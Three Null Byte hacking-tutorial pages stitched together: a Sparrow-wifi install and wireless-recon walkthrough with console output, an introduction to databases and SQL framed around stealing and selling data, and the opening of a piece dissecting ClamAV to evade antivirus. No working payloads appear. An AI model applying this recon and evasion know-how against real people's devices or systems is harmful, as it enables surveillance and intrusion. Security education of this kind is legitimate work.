Byte:HackThisSite Walkthrough, Part 4 - Legal Hacker TrainingCommunity Byte:HackThisSite Walkthrough, Part 6 - Legal Hacker TrainingGoodnight Byte:HackThisSite Walkthrough, Part 5 - Legal Hacker TrainingGoodnight Byte:HackThisSite Walkthrough, Part 8 - Legal Hacker TrainingCommunity Byte:HackThisSite Walkthrough, Part 1 - Legal Hacker TrainingHack Like a Pro:Hacking Samba on Ubuntu and Installing the MeterpreterCommunity Byte:HackThisSite Walkthrough, Part 2 - Legal Hacker TrainingNews:Let Me Introduce MyselfHow To:How Hackers Take Your Encrypted Passwords & Crack Them
How to Conduct Wireless Recon on Bluetooth, Wi-Fi & GPS with Sparrow-wifi Β« Null Byte :: WonderHowTo
If you're ever in a situation where you need to take a peek at the wireless spectrum, whether it's for Bluetooth or Wi-Fi devices, there's a fascinatingPython 3-based tool called Sparrow-wifi you should check out. It's cross-platform, easy to use, and has an impressive GUI that shows you the signal strength of nearby devices.Sparrow-wifi, branded as a "next-generation" analysis tool for wireless reconnaissance and surveillance, is simple to install. There's just a bunch of Python libraries you need, and then no matter what system you're on, it should be pretty easy to use. It works great on aRaspberry Pi, and just as good onKali Linux.What You Could Do with Sparrow-WifiGhostop14 created Sparrow-wifi to be installed on a Raspberry Pi attached to a drone or rover for war-flying or wardriving use cases. It was even tested out on a3DR Solo aerial drone, and you can read more about their experience using Sparrow-wifi on Raspberry Pi and drone onthe GitHub page. We'll just be using it on a Kali Linux system running on a laptop, but it'll be similar for a Pi-based project.Before getting into using Sparrow-wifi, it's good to show what all it can do. Being a "next-generation 2.4 GHz and 5 GHz Wifi spectral awareness tool," it has Wi-Fi capabilities, a software-defined radio, advanced Bluetooth options, and GPS capabilities (which can also be connected to the GPS on drones and rovers). The most prominent features worth pointing out today include but aren't limited to:Overlay 2.4 GHz and 5 GHz spectrums in real-time on top of the Wi-Fi spectrum.Identify SSID information for nearby devices over Wi-Fi.Identify nearby Bluetooth and Bluetooth LE devices.Track Bluetooth LE advertisement sources (iBeacons) with a telemetry window.Send out your own iBeacon advertisements.War-fly or wardrive using a Raspberry Pi on a drone or rover using GUI-controlled or autonomous scan and record modes.Import or export from or to a CSV file or JSON file.See Google Maps locations from GPS coordinates provided by discovered SSID or Bluetooth devices, which can be helpful to plot the Wi-Fi telemetry over time.What You Need to Get StartedYou'll need awireless network adapterthat can be put intomonitor mode. Aside from that, you'll need a computer to run it on that has Python 3, and that's it.Don't Miss:Buy the Best Wireless Network Adapter for Wi-Fi HackingRecommended Wireless Adapter:Alfa AWUS036NEH Network AdapterStep 1: Update & Upgrade KaliBefore installing anything, it's good to useupdateto resync and update package index files on the system from their sources, as well asupgradeto update all of the tools that have newer versions found in the update. The upgrade might take a while, depending on how many packages are out of date.~$ sudo apt update && sudo apt upgrade Hit:1 http://kali.download/kali kali-rolling InRelease Reading package lists... Done Building dependency tree Reading state information... Done 17 packages can be upgraded. Run 'apt list --upgradable' to see them. Reading package lists... Done Building dependency tree Reading state information... Done Calculating upgrade... Done The following packages were automatically installed and are no longer required: fonts-glyphicons-halflings gir1.2-appindicator3-0.1 libappindicator3-1 libboost-iostreams1.67.0 libboost-system1.67.0 libboost-thread1.67.0 libgdal26 libicu63 libmpdec2 libprotobuf22 libpython3.7-minimal libpython3.7-stdlib libqhull7 libre2-6 libx264-155 libx265-179 php7.3-mysql python3-flask-session python3-pcapfile python3.7 python3.7-minimal ruby-did-you-mean Use 'sudo apt autoremove' to remove them. The following packages have been kept back: crackmapexec gcc-10-base lib32gcc-s1 lib32stdc++6 libatomic1 libcc1-0 libgcc-s1 libgfortran5 libgomp1 libitm1 liblsan0 libobjc4 libquadmath0 libstdc++6 libtsan0 libubsan1 php-common 0 upgraded, 0 newly installed, 0 to remove and 17 not upgraded.Step 2: Install the Needed DependenciesNow, we need to install some of the Python 3 and GPS tools needed, including python3-pip, gpsd, gpsd-clients, python3-tk, and python3-setuptools. Use the following command to do so.~$ sudo apt install python3-pip gpsd gpsd-clients python3-tk python3-setuptools Reading package lists... Done Building dependency tree Reading state information... Done python3-setuptools is already the newest version (46.1.3-1). python3-setuptools set to manually installed. The following additional packages will be installed: gpsd-tools libgps26 python-pip-whl python3-gps python3-wheel Suggested packages: tix python3-tk-dbg The following NEW packages will be installed: gpsd gpsd-clients gpsd-tools libgps26 python-pip-whl python3-gps python3-pip python3-wheel The following packages will be upgraded: python3-tk 1 upgraded, 8 newly installed, 0 to remove and 824 not upgraded. Need to get 3,533 kB of archives. After this operation, 7,755 kB of additional disk space will be used. Do you want to continue? [Y/n] y Get:1 http://kali.download/kali kali-rolling/main amd64 libgps26 amd64 3.20-12 [98.6 kB] Get:2 http://kali.download/kali kali-rolling/main amd64 gpsd amd64 3.20-12 [413 kB] Get:3 http://kali.download/kali kali-rolling/main amd64 gpsd-tools amd64 3.20-12 [299 kB] Get:4 http://kali.download/kali kali-rolling/main amd64 python3-gps amd64 3.20-12 [105 kB] Get:5 http://kali.download/kali kali-rolling/main amd64 gpsd-clients amd64 3.20-12 [432 kB] Get:6 http://kali.download/kali kali-rolling/main amd64 python-pip-whl all 20.0.2-5kali1 [1,842 kB] Get:7 http://kali.download/kali kali-rolling/main amd64 python3-wheel all 0.34.2-1 [24.0 kB] Get:8 http://kali.download/kali kali-rolling/main amd64 python3-pip all 20.0.2-5kali1 [211 kB] Get:9 http://kali.download/kali kali-rolling/main amd64 python3-tk amd64 3.8.5-1 [109 kB] Fetched 3,533 kB in 1s (2,563 kB/s) Reading changelogs... Done Selecting previously unselected package libgps26:amd64. (Reading database ... 287092 files and directories currently installed.) Preparing to unpack .../0-libgps26_3.20-12_amd64.deb ... Unpacking libgps26:amd64 (3.20-12) ... Selecting previously unselected package gpsd. Preparing to unpack .../1-gpsd_3.20-12_amd64.deb ... Unpacking gpsd (3.20-12) ... Selecting previously unselected package gpsd-tools. Preparing to unpack .../2-gpsd-tools_3.20-12_amd64.deb ... Unpacking gpsd-tools (3.20-12) ... Selecting previously unselected package python3-gps. Preparing to unpack .../3-python3-gps_3.20-12_amd64.deb ... Unpacking python3-gps (3.20-12) ... Selecting previously unselected package gpsd-clients. Preparing to unpack .../4-gpsd-clients_3.20-12_amd64.deb ... Unpacking gpsd-clients (3.20-12) ... Selecting previously unselected package python-pip-whl. Preparing to unpack .../5-python-pip-whl_20.0.2-5kali1_all.deb ... Unpacking python-pip-whl (20.0.2-5kali1) ... Selecting previously unselected package python3-wheel. Preparing to unpack .../6-python3-wheel_0.34.2-1_all.deb ... Unpacking python3-wheel (0.34.2-1) ... Selecting previously unselected package python3-pip. Preparing to unpack .../7-python3-pip_20.0.2-5kali1_all.deb ... Unpacking python3-pip (20.0.2-5kali1) ... Preparing to unpack .../8-python3-tk_3.8.5-1_amd64.deb ... Unpacking python3-tk:amd64 (3.8.5-1) over (3.8.2-2) ... dpkg: warning: unable to delete old directory '/usr/lib/python3.7/tkinter': Directory not empty Setting up libgps26:amd64 (3.20-12) ... Setting up gpsd-tools (3.20-12) ... Setting up python3-tk:amd64 (3.8.5-1) ... Setting up python3-wheel (0.34.2-1) ... Setting up python-pip-whl (20.0.2-5kali1) ... Setting up python3-gps (3.20-12) ... Setting up gpsd (3.20-12) ... Creating/updating gpsd user account... gpsd.socket is a disabled or a static unit, not starting it. gpsd.service is a disabled or a static unit, not starting it. gpsd.socket is a disabled or a static unit, not starting it. Setting up gpsd-clients (3.20-12) ... Setting up python3-pip (20.0.2-5kali1) ... Processing triggers for desktop-file-utils (0.24-1) ... Processing triggers for mime-support (3.64) ... Processing triggers for libc-bin (2.30-4) ... Processing triggers for man-db (2.9.1-1) ... Processing triggers for kali-menu (2020.2.2) ...Before installing the next batch of tools that are needed, you should upgrade pip3 first to prevent errors that others have experienced when installing the other dependencies. Use the following command to do it.~$ sudo pip3 install --upgrade pip Collecting pip Downloading pip-20.2.2-py2.py3-none-any.whl (1.5 MB) |β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ| 1.5 MB 1.0 MB/s Installing collected packages: pip Attempting uninstall: pip Found existing installation: pip 20.0.2 Not uninstalling pip at /usr/lib/python3/dist-packages, outside environment /usr Can't uninstall 'pip'. No files were found to uninstall. Successfully installed pip-20.2.2Finally, install the last batch of dependencies needed for Sparrow-wifi, which include QScintilla, PyQtChart, gps3, dronekit, manuf, python-dateutil, numpy, and matplotlib.~$ sudo pip3 install QScintilla PyQtChart gps3 dronekit manuf python-dateutil numpy matplotlib Collecting QScintilla Downloading QScintilla-2.11.5-cp35.cp36.cp37.cp38-abi3-manylinux2014_x86_64.whl (2.6 MB) |β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ| 2.6 MB 1.0 MB/s Collecting PyQtChart Downloading PyQtChart-5.15.0-5.15.0-cp35.cp36.cp37.cp38-abi3-manylinux2014_x86_64.whl (1.2 MB) |β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ| 1.2 MB 7.2 MB/s Collecting gps3 Downloading gps3-0.33.3-py2.py3-none-any.whl (29 kB) Collecting dronekit Downloading dronekit-2.9.2-py3-none-any.whl (56 kB) |β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ| 56 kB 5.9 MB/s Collecting manuf Downloading manuf-1.1.1-py3-none-any.whl (539 kB) |β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ| 539 kB 10.4 MB/s Requirement already satisfied: python-dateutil in /usr/lib/python3/dist-packages (2.8.1) Requirement already satisfied: numpy in /usr/lib/python3/dist-packages (1.17.4) Requirement already satisfied: matplotlib in /usr/lib/python3/dist-packages (3.2.1) Requirement already satisfied: PyQt5>=5.10.1 in /usr/lib/python3/dist-packages (from QScintilla) (5.14.2) Collecting PyQt5-sip<13,>=12.8 Downloading PyQt5_sip-12.8.0-cp38-cp38-manylinux1_x86_64.whl (293 kB) |β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ| 293 kB 11.2 MB/s Collecting pymavlink>=2.2.20 Downloading pymavlink-2.4.9.tar.gz (3.6 MB) |β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ| 3.6 MB 8.2 MB/s Collecting monotonic>=1.3 Downloading monotonic-1.5-py2.py3-none-any.whl (5.3 kB) Requirement already satisfied: future in /usr/lib/python3/dist-packages (from pymavlink>=2.2.20->dronekit) (0.18.2) Requirement already satisfied: lxml in /usr/lib/python3/dist-packages (from pymavlink>=2.2.20->dronekit) (4.5.0) Building wheels for collected packages: pymavlink Building wheel for pymavlink (setup.py) ... done Created wheel for pymavlink: filename=pymavlink-2.4.9-cp38-cp38-linux_x86_64.whl size=3695087 sha256=91c89fc1e95245a57d461a2cb23fcbd10c7319249cf782eb575c17fbe1e3ffa0 Stored in directory: /root/.cache/pip/wheels/3b/26/1c/5500a65a7d7ac54cade1db721eefce7b5c6e451862a21423bb Successfully built pymavlink Installing collected packages: PyQt5-sip, QScintilla, PyQtChart, gps3, pymavlink, monotonic, dronekit, manuf Successfully installed PyQt5-sip-12.8.0 PyQtChart-5.15.0 QScintilla-2.11.5 dronekit-2.9.2 gps3-0.33.3 manuf-1.1.1 monotonic-1.5 pymavlink-2.4.9 PyQtChart gps3 dronekit manuf python-dateutil numpy matplotlibStep 3: Install Sparrow-wifiNow, we're ready to install Sparrow-wifi, which you can clone fromits GitHub repository. It's that easy, and we can start diving into what it has to offer and how to use it for wireless recon.~$ git clone https://github.com/ghostop14/sparrow-wifi Cloning into 'sparrow-wifi'... remote: Enumerating objects: 75, done. remote: Counting objects: 100% (75/75), done. remote: Compressing objects: 100% (53/53), done. remote: Total 593 (delta 42), reused 53 (delta 22), pack-reused 518 Receiving objects: 100% (593/593), 2.13 MiB | 3.14 MiB/s, done. Resolving deltas: 100% (397/397), done.Step 4: Run Sparrow-wifiWith Sparrow-wifi installed, let's change into its directory:~$ cd sparrow-wifi ~/sparrow-wifi$And see what's inside:~/sparrow-wifi$ ls docs sparrowhackrf.py images sparrowmap.py __init__.py sparrowrpi.py LICENSE sparrow-screenshot.png README.md sparrowtablewidgets.py rpi.setup_prerequisites.sh sparrowwifiagent.cfg.sample scripts sparrowwifiagent.py sparrowbluetooth.py sparrow-wifi.py sparrowcommon.py spectrum-screenshot.png sparrowdialogs.py telemetry.py sparrowdrone.py telemetry-screenshot.png sparrow-elastic.py wifi_icon.png sparrowgps.py wirelessengine.pyToday, we just want to use the main sparrow-wifi.py script; run that using:~/sparrow-wifi$ sudo ./sparrow-wifi.py WARNING: CPU random generator seem to be failing, disable hardware random number generation WARNING: RDRND generated: 0xffffffff 0xffffffff 0xffffffff 0xffffffff QStandardPaths: XDG_RUNTIME_DIR not set, defaulting to '/tmp/runtime-root'Step 5: Use Sparrow-wifi for ReconThat last command should open the GUI for Sparrow-wifi. Once it's up, we can select an interface that we want to scan on in theLocal Interfacedrop-down menu. Then, press the "Scan" button next to it.It will immediately start scanning for nearby devices, showing their SSIDs, MAC addresses, vendor names, security protocols, channels, frequencies, signal strengths, bandwidths, and more. It'll even show when the devices were first and last seen.While I don't have GPS activated, you can click the GPS icon in the top right of the window to open XGPS, which will show you the satellites being used to derive the GPS lock, as well as other useful data.Let's go over the menus real quick. In the "Agent" menu, you'll be able to connect to a remote agent, enable remote recordings, and perform agent discovery and configuration. We're not interested in any of this right now.Next up, we have "Geo," which will show us some tools for GPS. For instance, there's GPS coordinate monitoring, which will tell us the last valid coordinates. We can also launch XGPS from here, just like before, when clicking the GPS icon. We've also got a way to create an access point map, which you can attempt to use to see where everything relates to you. There's also an option to create an SSID map from telemetry, which is more about the signal strength and other data.Now for the "Bluetooth" menu. If you have Bluetooth enabled, you can create an iBeacon or scan for existing ones, provided that a Bluetooth device is advertising. That's not always the case since Bluetooth devices are dissimilar to Wi-Fi in terms of the way they advertise themselves and how you can discover them. For instance, they hop frequencies, so they'll never look Wi-Fi the 2.4 GHz graph, which makes them hard to track. Unfortunately, you also cannot scan for both Bluetooth and Bluetooth LE devices at the same time.In the "Spectrum" menu item, you can adjust the spectrum analyzer gain, but we're not interested in that for our purposes today.Next to the "Scan"/"Stop scanning" button, you can choose a differentScan Modefrom the drop-down. We were on "Normal," but if we switch it to "Hunt," select a channel that we want to narrow it down to, then rescan tohunta particular network.There's also an option available to remove any network that hasn't been seen in the last three minutes, which is excellent to get rid of all the junk you don't want after starting a hunt scan.Now, in the left-bottom 2.4 GHz pane, we can see which spectrums are being utilized and where they are. So that if we wanted to focus on a particular thing, we could click on one of the results.Once a result is highlighted, you can go up to the "Telemetry" menu, and choose "Telemetry For Selected Network."That'll open a new window with a tracker active. We can see the signal strength relative to this device, and if you have GPS enabled, you would be able to see the signal strength compared to the longitude and latitude changes as you move around. You could also point a directional antenna around to use the telemetry tracker to close in on the device.I'm not actually moving, so you're not going to see a big jump in signal strength in my screenshots, but if you move your directional antenna around and point it in the right direction, you'll see a big spike in strength in the top left pane. You can see spikes like that in our guides onchoosing the right antenna for Wi-Fi hackingandhunting down Wi-Fi devices with a directional antenna. But setting upWiresharkis a lot more complicated than just firing up Sparrow-wifi.Don't Miss:How to Pick an Antenna for Wi-Fi HackingSparrow-wifi Is Definitely Worth a LookSparrow wifi is a quick and easy way to throw up a GUI interface and see what's around you, whether you're looking for Bluetooth or Wi-Fi devices. Now, it's not exactly as advanced as something likeKismet, which can show you all sorts of detailed information about everything, but it's a really great Python tool to get started. It can even be mounted on a drone, which is pretty impressive.Don't Miss:Use Kismet to Watch Wi-Fi User Activity Through WallsWant to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseCover photo and screenshots by Retia/Null ByteRelatedHow To:Hack Wi-Fi Networks with BettercapHow To:Save Battery Power by Pairing Wi-Fi Connections with Cell Tower Signals on Your Galaxy Note 3How To:Build a Pumpkin Pi β€” The Rogue AP & MITM Framework That Fits in Your PocketHow To:Wardrive on an Android Phone to Map Vulnerable NetworksHow To:Wardrive with the Kali Raspberry Pi to Map Wi-Fi DevicesHow To:Auto-Manage Wireless Connections to Prolong Daily Battery Life on Your Samsung Galaxy Note 2How To:Switch or Connect to Wi-Fi Networks & Bluetooth Devices Right from the Control Center in iOS 13How to Hack Wi-Fi:Disabling Security Cameras on Any Wireless Network with Aireplay-NgHow To:Find Your Misplaced iPhone Using Your Apple WatchHow To:Extend Battery Life by Seamlessly Managing Wireless Radio Connections on Your Samsung Galaxy S3How To:Fully Control Your Galaxy S5 with Google Now Commandsβ€”No Root NeededBuyer's Guide:Top 20 Hacker Holiday Gifts for Christmas 2017How To:Connect to a network using Wi-Fi on a Mac computerNews:Amazon's Best Black Friday Deals on HeadphonesHow To:Find & Share Local Wi-Fi Passwords for Free Internet Everywhere You GoHow To:Make Your Android Automatically Switch to the Strongest WiFi NetworkHow To:Hack WiFi Passwords for Free Wireless Internet on Your PS3How To:What All the Bluetooth & Wi-Fi Symbols Mean in iOS 11's New Control Center (Blue, Gray, or Crossed Out)How To:Map Wardriving Data with Jupyter NotebookHow To:The Easiest Way to Share Your Complicated WiFi Password with Friends & Familyβ€”No Typing RequiredHow To:Turn Off All Tracking Sensors on Android 10How to Hack Wi-Fi:Getting Started with the Aircrack-Ng Suite of Wi-Fi Hacking ToolsNews:iOS 11.2 Beta 3 Released, Includes Pop-Up Alerts for Wi-Fi & Bluetooth Controls, New Control Center BarHow To:Buy the Best Wireless Network Adapter for Wi-Fi Hacking in 2019How To:Use Your Android as a Microphone for Your PCHow To:Check Wi-Fi Reliability & Speed at Hotels Before Booking a RoomHow To:Log Wi-Fi Probe Requests from Smartphones & Laptops with ProbemonBT Recon:How to Snoop on Bluetooth Devices Using Kali LinuxNews:The Best Black Friday 2019 Deals on Headphones for Your SmartphoneHow To:Use Kismet to Watch Wi-Fi User Activity Through WallsHow To:Find & Eradicate Android Apps Maliciously Tracking You on Your Samsung Galaxy Note 2How To:Find Saved WiFi Passwords in WindowsHow To:Skip Lock Screen Security on Your Samsung Galaxy Note 3 When Using Trusted NetworksHack Like a Pro:How to Get Even with Your Annoying Neighbor by Bumping Them Off Their WiFi Network β€”UndetectedHow To:Can't Log into Hotel Wi-Fi? Use This App to Fix Android's Captive Portal ProblemHow To:PAIRS Is the Easy Way to Restore Wi-Fi & Bluetooth Connections After Wiping Your PhoneNews:PSP2 (Next Generation Portable) or NGPHow To:Auto-Toggle Your Android Device's Wi-Fi On and Off When Near or Away from a HotspotHow To:Change Your Android Device's Wi-Fi Country Code to Access Wireless Networks AbroadHow To:Get Free Wi-Fi from Hotels & More
How to Hack Databases: The Terms & Technologies You Need to Know Before Getting Started Β« Null Byte :: WonderHowTo
Welcome back, my hacker apprentices!Although there is a multitude of different hacker types, the one target they all share is thedatabase. I often refer to the database as the hacker'sHoly Grail, or the ultimate prize for an effective hack.That's because the databaseβ€”almost by definitionβ€”is the repository of all the goodies that the hacker is pursuing. These goodies might includecredit card data, personally identifiable information, usernames and passwords, and intellectual property. Each of these items can be sold for significant sums of money in the black market.For instance, credit card numbers can be sold for between $5 to $50 depending upon the quality (gold and platinum cards are worth more than regular cards) and their credit limit. So, a hack that reaps 200,000 credit cards numbers is worth anywhere from $1 to $10 million!At the same time, state sponsored hackers, likeChina, are after intellectual property. This would include designs, formulas, engineering, and other things that they can steal and bring to China for manufacturing by Chinese companies. This is happening every day and some consider it the greatest theft in the history of the world!This is the first installment of a newNull Byteseries on database hacking. Before we examine how to hack a database, we need to understand the basics of how databases work, what SQL is, and what vulnerabilities are common to databases.So, let's get started so that we can quickly get to some DB hacking!What Is a Database?A database is a system of software to store and retrieve information in a structured format. Early databases were flat files, kind of like a big Excel file. As databases got bigger and bigger, this simple structure proved inefficient.As a result, a scientist at IBM, Dr. Codd, developed a structure that came to be known as the relational database model. It is this model that about 97% of all databases now use, and this includes all the major software companies.The basics of the relational model is that data should be placed in separate tables with unique keys that link the tables to avoid data duplication and to ease the retrieval of this data.The Structure of a DatabaseThis relational database model links data from separate tables by using a shared column or "key". The diagram below is of a simple relational database model where all the tables are linked by the column "ID".Major Vendors in the Database MarketThe enterprise database market has multiple vendors offering products that can accomplish the same task, but in different ways. The major players in this market are:Oracle. They are the behemoth in this market with nearly 50% market share. They own multiple different database software products, including their namesake and MySQL.Microsoft SQL Server. Microsoft entered this market in the early '90s by teaming up with Sybase to develop an enterprise database offering. As a result, MS SQL Server and Sybase still share many similarities. Originally, Microsoft was only a player in the small business market, but is slowly gaining traction in the larger enterprise market.MySQL. This is an open-source database that you will find behind so many web sites, in part, because it's free.IBM DB2. IBM was the original enterprise database provider and made many the major developments in database design, but like everything about IBM, it has been in decline in recent decades.Other major vendors includeSybase,SAS,PostgreSQL(open source), and many others. Generally, like any hack, we need to do good recon to determine the software and version to be successful as most of the database hacks are vendor specific.Structured Query Language (SQL)When IBM developed the early databases, they also developed a programming language for managing and manipulation this data. They called it "Structured Query Language," or as it is generally known,SQL.This is a simple language that uses English words in similar ways that humans who speak English use them. For instance...SELECTmeans "select some data from columns in a table"FROMmeans "get the data from this table"WHEREmeans select the data that meets this condition (lastname = 'smith').Furthermore, words such asUPDATE,INSERT, andDROPmean in SQL exactly what you would expect them to mean.SQL is not picky about syntax, but it is picky about logic. Although best practice is to CAPITALIZE all keywords (SELECT, FROM, WHERE), it's not required. In addition, white space is ignored. All but Microsoft, though, require that a SQL statement to end in a semicolon (;). On Microsoft products, it's optional.SQL is standardized by ANSI, but this standardization only includes about 80% of the language or the core of SQL. Software publishers are free to add additional commands and features that are not part of the standard. This can sometimes make it difficult to transport SQL code between DBMS. It also makes it critical to do good reconnaissance on the database to know the manufacturer and the version before attacking as the attacks are often specific to the manufacturer and the version.Each of the DBMS can be used from a command line, but each has its own GUI. Recently, MySQL released a new GUI called Workbench as seen in the previous section.Oracle, Microsoft, and the others have similar GUIs that allow the administrator to access their systems.Basic SQL QueryWhen we need to extract data from the database, it's said that we are "querying" the database. As databases are repositories for data, the ability to extract or query data is among the most important functions. As a hacker, we want to extract data, so the query is critical to getting the goods.The basic structure of the query looks like this:SELECT <columns>FROM <table>WHERE <conditions>This statement says "give me the data in the columns listed in the SELECT statement from the table that comes after the FROM keyword but only give me the rows that meet the conditions that come after the WHERE keyword."So, if we wanted to get first name, last name, username, and password from the staff table for employees with the last name of "Hillyer," we could construct a statement like this:SELECT first_name, last_name, username, passwordFROM staffWHERE last_name = 'Hillyer";As you can see in the screenshot above, we have extracted Mike Hillyer's record from the staff table with his username and password (the password is actually a hash of his password).SQL InjectionSQL injectionis the most common database attack and is probably responsible for the largest dollar volume of losses from cyber crime and advanced persistent threat (APT).It basically involves putting SQL commands in the data forms of webpages that connect to a database. These forms then send these SQL commands back to the database and the database will either authenticate the user (yes, authentication is a database function) or give up the target data.In future tutorials, we will spend quite a bit of time using SQL injection tools and executing SQL injection attacks.Other VulnerabilitiesBesides showing you how to do SQL injection, we will examine some of the other of vulnerabilities in databases. These involve authentication, using the database to compromising the operating system, and several others.Now that we having covered the basic terminology and technology related to databases, in future tutorials I will show you how to hack into these databases, so keep coming back!Want to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseDisk drive,database structure,blueprints, andcashimages via ShutterstockRelatedHow To:The Essential Skills to Becoming a Master HackerNews:How to Study for the White Hat Hacker Associate Certification (CWA)How to Hack Databases:Extracting Data from Online Databases Using SqlmapHow To:Top 10 Exploit Databases for Finding VulnerabilitiesHack Like a Pro:How to Find Exploits Using the Exploit Database in KaliHack Like a Pro:Linux Basics for the Aspiring Hacker, Part 14 (MySQL)How to Hack Databases:Hacking MySQL Online Databases with SqlmapHack Like a Pro:How to Find Website Vulnerabilities Using WiktoHack Like a Pro:Linux Basics for the Aspiring Hacker, Part 15 (Creating a Secure Tunnel to MySQL)How to Hack Databases:Running CMD Commands from an Online MS SQL ServerHow to Hack Databases:Hunting for Microsoft's SQL ServerSQL Injection 101:How to Fingerprint Databases & Perform General Reconnaissance for a More Successful AttackHow To:The Art of 0-Day Vulnerabilities, Part3: Command Injection and CSRF VulnerabilitiesHow to Hack Databases:Cracking SQL Server Passwords & Owning the ServerNews:Becoming a HackerHack Like a Pro:How to Find the Exact Location of Any IP AddressHow to Hack Like a Pro:Getting Started with MetasploitMac for Hackers:How to Manage Your Passwords with KeePassXHow To:Hack and Decrypt WhatsApp Database (Remotely) [ROOT]News:Accessing a PostgreSQL Database in your C/C++ ProgramHack Logs and Linux Commands:What's Going On Here?News:PostgreSQL Quick StartNews:ShouldIChangeMyPassword.comGoodnight Byte:HackThisSite, Realistic 4 - Real Hacking SimulationsHow To:The Essential Newbie's Guide to SQL Injections and Manipulating Data in a MySQL DatabaseNews:Getting Started With Wealthy Affiliate: Consider These 5 Benefits When You JoinGoodnight Byte:HackThisSite, Realistic 5 - Real Hacking SimulationsNews:MEDIA MANAGERS ( REVIEWED!... )Community Byte:HackThisSite, Realistic 5 - Real Hacking SimulationsHow To:Keep Stroke Patients Active at Home w/ Wii FitTVs Are for Old People:A Guide to Handheld ConsolesThe Null Byte Call to Arms:A Special Message to the Community
Hack Like a Pro: How Antivirus Software Works & How to Evade It, Pt. 2 (Dissecting ClamAV) Β« Null Byte :: WonderHowTo
Welcome back, my novice hackers!One of the most common questions that Null Byte readers ask is: "How can I evade detection by antivirus software on the target?" I have already talked abouthow AV software works, but to obtain a deeper understanding, what better way is there than opening up and dissecting some AV software?For the remainder ofthis series, we will be dissecting the most widely used, open-source, multi-platform AV software in the world,ClamAV.Just a quick side note before we begin: when I use the term antivirus, you can substitute anti-malware. I prefer the term anti-malware as viruses are a subset of malware, but the industry and the public still use the term antivirus, so I will use them synonymously. Please don't be confused.About ClamAVClamAV is an open-source (GNU public license) project that was purchased by Sourcefire in 2007, the same company that purchasedSnort. When Sourcefire was purchased by Cisco in 2013, both Snort and ClamAV became a part of Cisco, the networking giant.As detailedon their blog:"The ClamAV detection engine is multifacetedβ€”heuristics, support for numerous archivers (ZIP, RAR, OLE, etc.), tons of unpacking support (UPX,PEtite,NSPack, etc.), and several different content inspection engines."MRG did a third-party evaluation of Immunet Protect (uses ClamAV as one of its engines) where it outscored 15 other leading AV vendors and was the ONLY product that had a 100% detection rate."ClamAV is just as effective as commercial antivirus software, and is widely utilized to protect email gateway systems, though, generally not consumer level systems. ClamAV did recently develop a Windows version, so its acceptance at the consumer level is likely to improve.The beauty of working with ClamAV is that it is open source, so we can open it up and look inside to see and understand how it works. By doing this, we will have a better understanding of how all AV software works, and therefore can better devise strategies to evade it. This is not to say thatallAV software works the same, but they do work similarly.Inthis series, we will be examining the structure and operation of ClamAV. We will also look at its malware signatures, as well as develop our own malware signatures based upon some of the malware we use here on Null Byte to learn about hacking.Step 1: Fire Up KaliThe first step, as usual, is to fire upKaliand open a terminal.Step 2: Download ClamAVNext we have to download and install ClamAV on our Kali Linux system. There are multiple ways you can download ClamAV. The first, and probably the simplest, is to use the APTITUDE package manager:kali > apt-get install clamav clamav-freshclamOr, you can browse tothe ClamAV websiteand download it. 